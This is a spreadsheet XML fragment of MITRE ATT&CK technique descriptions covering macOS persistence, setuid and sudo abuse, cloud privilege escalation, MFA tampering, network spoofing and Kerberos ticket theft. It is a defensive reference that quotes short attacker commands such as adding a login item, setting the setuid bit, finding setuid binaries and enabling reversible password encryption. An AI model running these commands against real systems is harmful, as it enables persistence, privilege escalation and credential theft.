  </si>
  <si>
    <t>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</t>
  </si>
  <si>
    <t>T1548</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</si>
  <si>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risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)</t>
  </si>
  <si>
    <t>An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The &lt;code&gt;chmod&lt;/code&gt; command can set these bits with bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. This will enable the setuid bit. To enable the setgid bit, &lt;code&gt;chmod 2775&lt;/code&gt; and &lt;code&gt;chmod g+s&lt;/code&gt; can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;find&lt;/code&gt; command can also be used to search for such files. For example, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; can be used to find files with setuid set and &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the sudoers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/etc/sudoers&lt;/code&gt;.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.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</si>
  <si>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</si>
  <si>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Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. 
Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)
Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) 
Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)
While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)
**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can manipulate or abuse the Transparency, Consent, &amp; Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy &amp; Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based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In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1552</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</si>
  <si>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Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Entra ID,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t>
  </si>
  <si>
    <t>User Account: User Account Authentication</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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</si>
  <si>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t>
  </si>
  <si>
    <t>T1553</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)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After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes)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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (&lt;code&gt;G$RADIUSCHAP&lt;/code&gt;) from the Active Directory user-structure &lt;code&gt;userParameters&lt;/code&gt;
2. 16 byte randomly-generated value (&lt;code&gt;G$RADIUSCHAPKEY&lt;/code&gt;) also from &lt;code&gt;userParameters&lt;/code&gt;
3. Global LSA secret (&lt;code&gt;G$MSRADIUSCHAPKEY&lt;/code&gt;)
4. Static key hardcoded in the Remote Access Subauthentication DLL (&lt;code&gt;RASSFM.DLL&lt;/code&gt;)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to &lt;code&gt;Set-ADUser -AllowReversiblePasswordEncryption $true&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.
Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)
For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) 
Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) </t>
  </si>
  <si>
    <t>IaaS, Identity Provider, Office Suite, SaaS, Windows</t>
  </si>
  <si>
    <t>Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID 
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)</t>
  </si>
  <si>
    <t>Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) 
Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)
Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)</t>
  </si>
  <si>
    <t>Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. 
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>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including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics)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
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</si>
  <si>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 
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t xml:space="preserve">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intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: 
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address. 
3. The client broadcasts a `REQUEST` message, which includes the network address offered. 
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; message to the &lt;code&gt;All_DHCP_Relay_Agents_and_Servers&lt;/code&gt; multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)
By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin)  Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. 
Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.
Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points. </t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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Logon Session: Logon Session Metadata</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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Credential Request</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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Access</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. 
The &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, which obtains a Ticket-Granting-Ticket (TGT) for the principal; &lt;code&gt;klist&lt;/code&gt;, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)
Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) </t>
  </si>
  <si>
    <t>T1559</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Process: Process Access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</si>
  <si>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t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1561</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1562</t>
  </si>
  <si>
    <t xml:space="preserve">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preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also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 It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). </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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1563</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1564</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)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Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding &lt;code&gt;explorer.exe&lt;/code&gt; process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Process: Process Creation</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)
Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1566</t>
  </si>
  <si>
    <t>Identity Provider, Linux, Office Suite, SaaS, Windows, macOS</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</si>
  <si>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or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)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</si>
  <si>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 xml:space="preserve">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</si>
  <si>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
Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)</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</si>
  <si>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Lookout Dark Caracal Jan 2018)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</si>
  <si>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t>
  </si>
  <si>
    <t>T1567</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1568</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1569</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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T1570</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1571</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1572</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</si>
  <si>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or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Adversaries may employ an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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
